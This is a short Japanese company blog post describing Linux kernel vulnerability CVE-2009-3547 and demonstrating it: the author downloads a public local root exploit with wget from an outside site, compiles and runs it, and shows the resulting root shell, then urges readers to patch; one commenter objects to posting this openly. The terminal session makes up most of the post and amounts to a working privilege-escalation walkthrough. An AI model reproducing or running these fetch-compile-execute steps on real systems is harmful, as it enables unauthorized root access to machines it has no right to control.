INSANEWORKS,LLC
Hostname: ec2-23-22-58-239.compute-1.amazonaws.com
IP Addr: 23.22.58.239
1211月/092

Linuxカーネルに深刻なバグ[CVE-2009-3547]

CVE-2009-3547

代表のKotaです。

Linuxカーネルの脆弱性RHSA-2009:1548-1が出ています。

今回は折角なのでroot権を奪取してみましょう。

内容はこんな感じです

Linuxカーネルのpipe_read_open()、pipe_write_open()、およびpipe_rdwr_open()の各関数に NULLポインタデリファレンス欠陥が見つかりました。mutexロックが保持されていない場合、パイプのリーダとライタのカウンタ更新に使用される前に i_pipeポインタが他のプロセスによって解放される可能性がありました。それによってローカルのサービス拒否または権限昇格につながる可能性がありま した。(CVE-2009-3547、深刻度:重要)

exploitsコードが公開されているので権限昇格するか試してみましょう。

-bash-3.2$ uname -sr
Linux 2.6.18-8.el5PAE
-bash-3.2$ wget -q \
www.tux-planet.fr/public/hack/exploits/kernel/local-root-exploit-gayros.c
-bash-3.2$ gcc local-root-exploit-gayros.c -o gayros
-bash-3.2$ ./gayros
We got NULL page babe!
Using kernel version 2.6.18-8.el5PAE.
Found version 1 structure, doing our tricks in memory...
Go go go boy!
We've got bush!
sh-3.2#
sh-3.2#id
uid=0(root) gid=0(root) 所属グループ=1000(user)

あっという間にroot権限奪取成功。。早めの対策を!!

Posted by Kota

INSANEWORKSの代表&ネットワーク/サーバーエンジニアをさせて頂いております。 よろしくお願いします。
Comments (2) Trackbacks (0)
  1. こーゆーのをそのまま書いちゃいかん~


コメントを残す

No trackbacks yet.